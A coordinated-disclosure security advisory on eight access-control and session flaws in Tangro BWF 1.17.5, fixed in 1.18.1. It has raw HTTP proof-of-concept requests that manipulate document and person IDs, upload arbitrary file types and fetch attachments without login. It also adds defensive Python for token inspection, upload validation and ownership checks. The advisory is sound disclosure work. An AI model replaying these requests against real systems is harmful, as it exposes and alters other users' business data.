Advisory: Tangro BWF 1.17.5 Multiple Vulnerabilities
- Adding Attachments to Arbitrary Workitem (CVE-2020-26171)
- JWT without Expiration (CVE-2020-26172)
- Unauthenticated PDF Download (CVE-2020-26173)
- Upload Filetype Constraint Bypass (CVE-2020-26174)
- Profile Attributes of Other Users Writable (CVE-2020-26175)
- Unauthorised Listing of Attachments (CVE-2020-26176)
- Editing Disabled Profile Attributes (CVE-2020-26177)
- Unauthenticated Download of Workitem Attachments (CVE-2020-26178)
Detailed Security Advisories
Adding Attachments to Arbitrary Workitem (CVE-2020-26171)
Product: Tangro BWF
Vendor: tangro software components GmbH (Heidelberg, Germany)
Tested Version: 1.17.5
Fixed Version: 1.18.1
Vulnerability Type: Insecure Direct Object Reference
CVSSv2 Severity: AV:N/AC:L/Au:S/C:N/I:P/A:N (Score 4.0)
CVSSv3 Severity: AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N (Score 4.3)
CWE Reference: CWE-639
CVE Reference: CVE-2020-26171
Authors: Dimitri Lesy & Tobias Györfi, Thinking Objects GmbH

### Overview

The "documentId" of attachment uploads to "/api/document/attachments/upload" can be manipulated. By doing this, an authenticated user can add attachments to workitems that do not belong to them.

### Proof of Concept

When uploading an attachment to a document, the upload request specifies a document ID:

```
POST /api/document/attachments/upload HTTP/1.1
Host: <Tangro Host>
Content-Length: 410
X-AUTH-TOKEN: "<TOKEN>"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarylayr7DbpEgYZ2lrs

------WebKitFormBoundarylayr7DbpEgYZ2lrs
Content-Disposition: form-data; name="documentId"

100000000000123456
------WebKitFormBoundarylayr7DbpEgYZ2lrs
Content-Disposition: form-data; name="file"; filename="file.txt"
Content-Type: text/plain

test
------WebKitFormBoundarylayr7DbpEgYZ2lrs
Content-Disposition: form-data; name="archiveObject"

/SSC/CSV
------WebKitFormBoundarylayr7DbpEgYZ2lrs--
```

By manipulating the "documentId", the file is added to whichever document has been specified; the server does not check that the document belongs to the requesting user.

### Remediation

In order to remediate this vulnerability, the Tangro BWF software update 1.18.1 must be installed.
JWT without Expiration (CVE-2020-26172)
Product: Tangro BWF
Vendor: tangro software components GmbH (Heidelberg, Germany)
Tested Version: 1.17.5
Fixed Version: 1.18.1
Vulnerability Type: Session Fixation
CVSSv2 Severity: AV:N/AC:H/Au:N/C:P/I:P/A:N (Score 4.0)
CVSSv3 Severity: AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N (Score 4.2)
CWE Reference: CWE-294
CVE Reference: CVE-2020-26172
Authors: Dimitri Lesy & Tobias Györfi, Thinking Objects GmbH

### Overview

Every login of a given user in Tangro generates the same JWT, which allows an attacker who has captured the token to reuse it while a session is active. The JWT does not contain an expiration timestamp (there is no "exp" claim), which enables an attacker to bypass authentication by capture-replay.

### Proof of Concept

Decoded structure of the token:

```
Headers = {
  "typ" : "JWT",
  "alg" : "HS256"
}

Payload = {
  "lastName" : "<LastName>",
  "firstName" : "<FirstName>",
  "isSapUser" : false,
  "person" : "1234",
  "validPassword" : true,
  "fullName" : "<FullName>",
  "language" : "DE",
  "username" : "<Username>"
}

Signature = "<Signature>"
```

### Remediation

In order to remediate this vulnerability, the Tangro BWF software update 1.18.1 must be installed.
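The following is an added example and not code from the advisory or from Tangro. It shows how to inspect a token of the shape above for the two properties the advisory describes: the absence of any lifetime claim ("exp", and also "iat"/"nbf"/"jti"), and two logins yielding byte-identical tokens. To run offline it mints HS256 tokens itself with a made-up key and a payload modelled on the advisory; the key, names and the hardened claim set are assumptions of the example, not Tangro's.

```python
"""Inspect a JWT for replay-relevant weaknesses (added example, not Tangro code)."""
import base64
import hashlib
import hmac
import json
import secrets
import time
from typing import Dict, List, Optional, Tuple


def _b64url_decode(segment: str) -> bytes:
    # JWT segments are base64url without padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def _b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def decode_jwt_unverified(token: str) -> Tuple[Dict, Dict]:
    """Return (header, payload) WITHOUT checking the signature.

    Inspection only: never use unverified claims for an authorization decision.
    """
    header_b64, payload_b64, _signature_b64 = token.split(".")
    return json.loads(_b64url_decode(header_b64)), json.loads(_b64url_decode(payload_b64))


def token_findings(token: str, now: Optional[float] = None) -> List[str]:
    """List lifetime/replay weaknesses visible in an (unverified) token."""
    header, payload = decode_jwt_unverified(token)
    findings = []
    if str(header.get("alg", "")).lower() == "none":
        findings.append("alg=none: signature not enforced")
    if "exp" not in payload:
        findings.append("no exp claim: token never expires")
    elif now is not None and payload["exp"] < now:
        findings.append("token is expired")
    if "iat" not in payload and "nbf" not in payload:
        findings.append("no iat/nbf claim: token carries no issue time")
    if "jti" not in payload:
        findings.append("no jti claim: token cannot be individually revoked")
    return findings


def logins_produce_identical_tokens(token_a: str, token_b: str) -> bool:
    """True when two separate logins yield the same token (deterministic issuance)."""
    return hmac.compare_digest(token_a.encode(), token_b.encode())


def sign_hs256(payload: Dict, key: bytes) -> str:
    """Mint an HS256 JWT; stands in for the server so the example runs offline."""
    header = {"typ": "JWT", "alg": "HS256"}
    segments = [_b64url_encode(json.dumps(p, separators=(",", ":"), sort_keys=True).encode())
                for p in (header, payload)]
    signing_input = ".".join(segments)
    signature = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{_b64url_encode(signature)}"


# Constructed sample: key and identity are made up; the claim set mirrors the
# advisory's payload, which carries no time-bound or unique claim at all.
EXAMPLE_KEY = b"example-key-not-real"
STATIC_PAYLOAD = {
    "lastName": "Doe", "firstName": "Jane", "isSapUser": False,
    "person": "1234", "validPassword": True, "fullName": "Jane Doe",
    "language": "DE", "username": "jdoe",
}


def hardened_payload(base: Dict, ttl_seconds: int = 900, now: Optional[float] = None) -> Dict:
    """Same identity claims plus a short lifetime and a per-login unique id."""
    issued = int(now if now is not None else time.time())
    return {**base, "iat": issued, "exp": issued + ttl_seconds, "jti": secrets.token_hex(8)}


if __name__ == "__main__":
    weak_a = sign_hs256(STATIC_PAYLOAD, EXAMPLE_KEY)
    weak_b = sign_hs256(STATIC_PAYLOAD, EXAMPLE_KEY)   # "second login"
    print("identical across logins:", logins_produce_identical_tokens(weak_a, weak_b))
    print("findings:", token_findings(weak_a))
    strong = sign_hs256(hardened_payload(STATIC_PAYLOAD), EXAMPLE_KEY)
    print("hardened findings:", token_findings(strong, now=time.time()))
```

Against a real deployment you would paste the value of the X-AUTH-TOKEN header from two separate logins into `logins_produce_identical_tokens` and run `token_findings` on one of them; the functions never need the signing key.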
Unauthenticated PDF Download (CVE-2020-26173)
Product: Tangro BWF
Vendor: tangro software components GmbH (Heidelberg, Germany)
Tested Version: 1.17.5
Fixed Version: 1.18.1
Vulnerability Type: Incorrect Access Control
CVSSv2 Severity: AV:N/AC:H/Au:N/C:P/I:N/A:N (Score 2.6)
CVSSv3 Severity: AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N (Score 3.1)
CWE Reference: CWE-639
CVE Reference: CVE-2020-26173
Authors: Dimitri Lesy & Tobias Györfi, Thinking Objects GmbH

### Overview

PDF files of invoices are served over the "/api/pdf/<documentID>" API endpoint and secured using an additional token:

https://<Tangro Host>/api/pdf/00000000000000123456?token=<Token>

While the token prevents access to a PDF by anyone who does not know the token belonging to that document, the API endpoint does not verify that the user requesting the document is logged in. As a result, anyone who knows a document's ID and token can download the PDF without authenticating.

### Remediation

In order to remediate this vulnerability, the Tangro BWF software update 1.18.1 must be installed.
Upload Filetype Constraint Bypass (CVE-2020-26174)
Product: Tangro BWF
Vendor: tangro software components GmbH (Heidelberg, Germany)
Tested Version: 1.17.5
Fixed Version: 1.18.1
Vulnerability Type: Upload Filetype Constraint Bypass
CVSSv2 Severity: AV:N/AC:L/Au:S/C:C/I:C/A:C (Score 9.0)
CVSSv3 Severity: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (Score 8.8)
CWE Reference: CWE-434
CVE Reference: CVE-2020-26174
Authors: Dimitri Lesy & Tobias Györfi, Thinking Objects GmbH

### Overview

The Tangro application requests a list of allowed filetypes from the server and restricts uploads to the filetypes contained in this list. However, this restriction is enforced only in the browser (client-side) and can easily be circumvented by sending the upload request directly. This allows an authenticated attacker to upload a file of any type as an attachment to a workitem. In a worst-case scenario, this vulnerability could lead to remote code execution.

### Proof of Concept

Request:

```
POST /api/document/attachments/upload HTTP/1.1
Host: <Tangro Host>
X-AUTH-TOKEN: "<Token>"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynhbkhkaxOGRUpaZa

------WebKitFormBoundarynhbkhkaxOGRUpaZa
Content-Disposition: form-data; name="documentId"

100000000000123456
------WebKitFormBoundarynhbkhkaxOGRUpaZa
Content-Disposition: form-data; name="file"; filename="unsupportedfiletype.thinking"
Content-Type: text/plain

The content of the file.
------WebKitFormBoundarynhbkhkaxOGRUpaZa
Content-Disposition: form-data; name="archiveObject"

/SSC/CSV
------WebKitFormBoundarynhbkhkaxOGRUpaZa--
```

Server response:

```
HTTP/1.1 200 OK
Pragma: no-cache
Expires: -1
Content-Type: text/plain; charset=utf-8
Cache-Control: no-cache
Connection: close
Date: Thu, 17 Sep 2020 09:38:48 GMT

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
```

### Remediation

In order to remediate this vulnerability, the Tangro BWF software update 1.18.1 must be installed.
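The following is an added example and not Tangro code; it shows the check that has to live on the server for a finding like this one. The allowlist is applied to the filename actually received, the client's Content-Type must agree with the extension, and binary types must start with their known magic bytes so that a renamed payload does not pass. The allowlist, size limit and sample uploads are constructed for the example and are not taken from the product.

```python
"""Server-side allowlist check for attachment uploads (added example, not Tangro code)."""
import os
import re
from typing import Tuple

# Constructed allowlist: extension -> (accepted Content-Type values, magic-byte prefixes).
# Text formats have no reliable magic bytes, so they get an empty tuple.
ALLOWED_TYPES = {
    ".pdf": ({"application/pdf"}, (b"%PDF-",)),
    ".png": ({"image/png"}, (b"\x89PNG\r\n\x1a\n",)),
    ".jpg": ({"image/jpeg"}, (b"\xff\xd8\xff",)),
    ".csv": ({"text/csv", "text/plain"}, ()),
    ".txt": ({"text/plain"}, ()),
}
MAX_UPLOAD_BYTES = 10 * 1024 * 1024           # assumed limit for the example
_SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,127}$")


class UploadRejected(ValueError):
    """Raised for any upload the server must refuse."""


def validate_upload(filename: str, content_type: str, data: bytes) -> str:
    """Return a sanitized filename for storage, or raise UploadRejected.

    Every decision is made from what the server received, never from what the
    browser promised: the declared name is reduced to a basename, only its LAST
    extension is matched against the allowlist ("invoice.pdf.exe" is .exe), the
    Content-Type must agree with that extension, and binary types must carry
    their magic bytes.
    """
    name = os.path.basename(filename.replace("\\", "/"))
    if not _SAFE_NAME.match(name):
        raise UploadRejected("filename contains disallowed characters")
    if len(data) > MAX_UPLOAD_BYTES:
        raise UploadRejected("file too large")
    ext = os.path.splitext(name)[1].lower()
    if ext not in ALLOWED_TYPES:
        raise UploadRejected(f"file type {ext or '(none)'} not permitted")
    accepted_mimes, magics = ALLOWED_TYPES[ext]
    declared = content_type.split(";", 1)[0].strip().lower()
    if declared not in accepted_mimes:
        raise UploadRejected(f"Content-Type {declared!r} does not match {ext}")
    if magics and not any(data.startswith(m) for m in magics):
        raise UploadRejected("file content does not match declared type")
    if not magics and b"\x00" in data[:1024]:
        raise UploadRejected("binary content in a text-only type")
    return name


def check_upload(filename: str, content_type: str, data: bytes) -> Tuple[bool, str]:
    """Convenience wrapper returning (accepted, stored-name-or-reason)."""
    try:
        return True, validate_upload(filename, content_type, data)
    except UploadRejected as exc:
        return False, str(exc)


if __name__ == "__main__":
    # Constructed samples, including the advisory's ".thinking" upload.
    for sample in [
        ("unsupportedfiletype.thinking", "text/plain", b"The content of the file."),
        ("file.txt", "text/plain", b"test"),
        ("invoice.pdf", "application/pdf", b"MZ\x90\x00 renamed executable"),
        ("invoice.pdf", "application/pdf", b"%PDF-1.4 real pdf"),
    ]:
        print(sample[0], "->", check_upload(*sample))
```

Serving stored attachments with a fixed Content-Disposition: attachment header and never from a path the web server executes is the other half of the defence; the allowlist alone does not make a stored file safe to execute.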
Profile Attributes of Other Users Writable (CVE-2020-26175)
Product: Tangro BWF
Vendor: tangro software components GmbH (Heidelberg, Germany)
Tested Version: 1.17.5
Fixed Version: 1.18.1
Vulnerability Type: Insecure Direct Object Reference
CVSSv2 Severity: AV:N/AC:L/Au:S/C:N/I:C/A:N (Score 6.8)
CVSSv3 Severity: AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N (Score 6.5)
CWE Reference: CWE-639
CVE Reference: CVE-2020-26175
Authors: Dimitri Lesy & Tobias Györfi, Thinking Objects GmbH

### Overview

The value of "PERSON" in requests to /api/profile can be manipulated in order to change profile information of other users.

### Proof of Concept

```
POST /api/profile HTTP/1.1
Host: <Tangro Host>
-- SNIP --

{
  "DESCRIPTION":"",
  "ADDRESS_NAME1":"<Name>",
  -- SNIP --
  "PERSON":"1234",
  "BIRTHDAY":"0000-00-00",
  "MANDT":"XXX"
```

By manipulating the "PERSON" ID, it is possible to change the profile information of other users.

### Remediation

In order to remediate this vulnerability, the Tangro BWF software update 1.18.1 must be installed.
Unauthorised Listing of Attachments (CVE-2020-26176)
Product: Tangro BWF
Vendor: tangro software components GmbH (Heidelberg, Germany)
Tested Version: 1.17.5
Fixed Version: 1.18.1
Vulnerability Type: Insecure Direct Object Reference
CVSSv2 Severity: AV:N/AC:L/Au:S/C:P/I:N/A:N (Score 4.0)
CVSSv3 Severity: AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N (Score 4.3)
CWE Reference: CWE-639
CVE Reference: CVE-2020-26176
Authors: Dimitri Lesy & Tobias Györfi, Thinking Objects GmbH

### Overview

There are no (or broken) access control checks on the "/api/document/<DocumentID>/attachments" API endpoint. Knowing a document ID, an authenticated user can list all attachments of that workitem, including their respective IDs. This allows an attacker to gather valid attachment IDs for workitems that do not belong to them.

### Proof of Concept

Request:

```
GET /api/document/<DocumentID>/attachments HTTP/1.0
Host: <Tangro Host>
X-AUTH-TOKEN: "<Token>"
```

Response:

```
HTTP/1.0 200 OK
Content-Type: application/json; charset=utf-8
Date: Thu, 17 Sep 2020 11:00:33 GMT

[{"archiveDocumentId":"<AttachmentID>","archiveId":"D1","archiveObject":"/SSC/PDF","creationDate":1594764000000,"name":"","sapBusinessObject":"<SAP ID>","user":""}]
```

### Remediation

In order to remediate this vulnerability, the Tangro BWF software update 1.18.1 must be installed.
Editing Disabled Profile Attributes (CVE-2020-26177)
Product: Tangro BWF
Vendor: tangro software components GmbH (Heidelberg, Germany)
Tested Version: 1.17.5
Fixed Version: 1.18.1
Vulnerability Type: Incorrect Access Control
CVSSv2 Severity: AV:N/AC:L/Au:S/C:N/I:P/A:N (Score 4.0)
CVSSv3 Severity: AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N (Score 4.3)
CWE Reference: CWE-639
CVE Reference: CVE-2020-26177
Authors: Dimitri Lesy & Tobias Györfi, Thinking Objects GmbH

### Overview

A user's profile contains some items that are greyed out and thus are not intended to be edited by regular users. However, this restriction is only applied client-side. Manipulating any of the greyed-out values in requests to "/api/profile" is not prohibited server-side.

### Remediation

In order to remediate this vulnerability, the Tangro BWF software update 1.18.1 must be installed.
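The two profile findings (CVE-2020-26175 and CVE-2020-26177) share one server-side fix, shown here as an added example that is not Tangro code: the record to update is taken from the authenticated session rather than from a "PERSON" value in the body, and only fields the user is meant to edit are written, regardless of what the browser greys out. Field names follow the advisory's request; the session model, the editable-field set and the sample profiles are assumptions constructed for the example.

```python
"""Profile update: identity from session, fields by allowlist (added example, not Tangro code)."""
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

# Assumed allowlist for the example: what a regular user may change. Everything
# else (e.g. MANDT, the SAP client, or PERSON itself) is server-owned.
USER_EDITABLE_FIELDS = frozenset({"DESCRIPTION", "ADDRESS_NAME1", "BIRTHDAY"})


@dataclass
class Session:
    person: str   # identity established at login, never taken from the request body


@dataclass
class ProfileStore:
    profiles: Dict[str, Dict[str, str]] = field(default_factory=dict)

    def vulnerable_update(self, body: Dict[str, str]) -> Dict[str, str]:
        """The pattern the advisory describes: trust PERSON and write every field sent."""
        target = self.profiles[body["PERSON"]]
        target.update(body)
        return target

    def update(self, session: Session, body: Dict[str, str]) -> Tuple[Dict[str, str], List[str]]:
        """Hardened update.

        The target row is the session's own person. A PERSON in the body that
        disagrees with the session is rejected loudly (it is worth an alert, not
        a silent fix-up). Fields outside the allowlist are dropped and reported
        back so the caller can log the attempt.
        """
        if "PERSON" in body and body["PERSON"] != session.person:
            raise PermissionError("PERSON in request body does not match the session")
        target = self.profiles[session.person]
        accepted = {k: v for k, v in body.items() if k in USER_EDITABLE_FIELDS}
        ignored = sorted(k for k in body if k not in accepted and k != "PERSON")
        target.update(accepted)
        return target, ignored


if __name__ == "__main__":
    # Constructed sample data: two users in the same SAP client.
    store = ProfileStore({
        "1234": {"PERSON": "1234", "ADDRESS_NAME1": "Alice", "MANDT": "100"},
        "5678": {"PERSON": "5678", "ADDRESS_NAME1": "Bob", "MANDT": "100"},
    })
    alice = Session(person="1234")
    print(store.update(alice, {"PERSON": "1234", "ADDRESS_NAME1": "Alice B.", "MANDT": "999"}))
    try:
        store.update(alice, {"PERSON": "5678", "ADDRESS_NAME1": "Mallory"})
    except PermissionError as exc:
        print("rejected:", exc)
```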
Unauthenticated Download of Workitem Attachments (CVE-2020-26178)
Product: Tangro BWF
Vendor: tangro software components GmbH (Heidelberg, Germany)
Tested Version: 1.17.5
Fixed Version: 1.18.1
Vulnerability Type: Insecure Direct Object Reference
CVSSv2 Severity: AV:N/AC:L/Au:N/C:P/I:N/A:N (Score 5.0)
CVSSv3 Severity: AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N (Score 5.3)
CWE Reference: CWE-639
CVE Reference: CVE-2020-26178
Authors: Dimitri Lesy & Tobias Györfi, Thinking Objects GmbH

### Overview

Knowing an attachment ID, it is possible to download workitem attachments without being authenticated.

### Proof of Concept

https://<Tangro Host>/api/document/attachment/<AttachmentID>?archiveName=D1&fileType=/SSC/PDF

### Remediation

In order to remediate this vulnerability, the Tangro BWF software update 1.18.1 must be installed.
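Four of the findings above (CVE-2020-26171, CVE-2020-26173, CVE-2020-26176 and CVE-2020-26178) are the same missing check seen from different endpoints: an operation on a workitem's attachments or PDF must first require an authenticated session and then verify that the caller owns the parent workitem, even when the request names only an attachment ID or carries a per-document token. The following is an added example of that access path and is not Tangro code; the in-memory store, the session table, the identifiers and the way an attachment is resolved to its parent are all constructed for the example.

```python
"""Object-level authorization for workitem attachments (added example, not Tangro code)."""
import secrets
from dataclasses import dataclass, field
from typing import Dict, List, Optional


class Unauthenticated(Exception):
    """No valid session: the request must be refused before any lookup."""


class Forbidden(Exception):
    """Valid session, but the object does not belong to the caller."""


@dataclass
class Workitem:
    document_id: str
    owner: str
    pdf_token: str = field(default_factory=lambda: secrets.token_hex(16))
    attachments: Dict[str, str] = field(default_factory=dict)   # attachment_id -> filename


@dataclass
class AttachmentService:
    workitems: Dict[str, Workitem]
    sessions: Dict[str, str]   # X-AUTH-TOKEN value -> person (assumed session table)

    # ---- shared checks ---------------------------------------------------
    def _require_session(self, auth_token: Optional[str]) -> str:
        person = self.sessions.get(auth_token or "")
        if person is None:
            raise Unauthenticated("valid X-AUTH-TOKEN required")
        return person

    def _require_owned_workitem(self, person: str, document_id: str) -> Workitem:
        item = self.workitems.get(document_id)
        # Same response for "does not exist" and "not yours", so document IDs
        # cannot be confirmed by probing.
        if item is None or item.owner != person:
            raise Forbidden("workitem not accessible")
        return item

    def _workitem_for_attachment(self, attachment_id: str) -> Optional[Workitem]:
        # Authorization for an attachment is decided on its PARENT workitem.
        return next((w for w in self.workitems.values() if attachment_id in w.attachments), None)

    # ---- endpoints -------------------------------------------------------
    def upload_attachment(self, auth_token: Optional[str], document_id: str, filename: str) -> str:
        person = self._require_session(auth_token)
        item = self._require_owned_workitem(person, document_id)
        attachment_id = secrets.token_hex(8)
        item.attachments[attachment_id] = filename
        return attachment_id

    def list_attachments(self, auth_token: Optional[str], document_id: str) -> List[str]:
        person = self._require_session(auth_token)
        return sorted(self._require_owned_workitem(person, document_id).attachments)

    def download_attachment(self, auth_token: Optional[str], attachment_id: str) -> str:
        person = self._require_session(auth_token)
        item = self._workitem_for_attachment(attachment_id)
        if item is None or item.owner != person:
            raise Forbidden("attachment not accessible")
        return item.attachments[attachment_id]

    def download_pdf(self, auth_token: Optional[str], document_id: str, pdf_token: str) -> str:
        # The per-document token is an additional check, not a substitute for login.
        person = self._require_session(auth_token)
        item = self._require_owned_workitem(person, document_id)
        if not secrets.compare_digest(item.pdf_token, pdf_token):
            raise Forbidden("bad document token")
        return f"pdf-bytes-for-{document_id}"


if __name__ == "__main__":
    # Constructed sample: Alice owns one workitem, Bob another.
    svc = AttachmentService(
        workitems={"100000000000123456": Workitem("100000000000123456", "alice", pdf_token="tok-a"),
                   "100000000000654321": Workitem("100000000000654321", "bob")},
        sessions={"alice-token": "alice", "bob-token": "bob"},
    )
    aid = svc.upload_attachment("alice-token", "100000000000123456", "file.txt")
    for label, call in [
        ("bob uploads to alice's workitem", lambda: svc.upload_attachment("bob-token", "100000000000123456", "x.txt")),
        ("bob lists alice's attachments", lambda: svc.list_attachments("bob-token", "100000000000123456")),
        ("anonymous downloads attachment", lambda: svc.download_attachment(None, aid)),
        ("anonymous downloads pdf with token", lambda: svc.download_pdf(None, "100000000000123456", "tok-a")),
    ]:
        try:
            call()
            print(label, "-> ALLOWED (bug)")
        except (Unauthenticated, Forbidden) as exc:
            print(label, "->", type(exc).__name__, exc)
```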
Disclosure Timeline
2020-09-17: Vulnerability discovered
2020-10-01: Vulnerability reported to vendor
2020-10-01: Vendor responded immediately
2020-10-21: Vulnerability fix implemented, software update enters QA
2020-11-04: Vulnerability fixed, software update 1.18.1 released
2020-12-17: Vulnerability disclosed
References
[1] Advisory URL: https://blog.to.com/advisory-tangro-bwf-1-17-5-multiple-vulnerabilities
[2] Tangro Website: https://www.tangro.de/
Disclaimer
The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide information that is as accurate as possible. The latest version of this security advisory is available on https://blog.to.com.
Copyright: Creative Commons – Attribution (by) – Version 3.0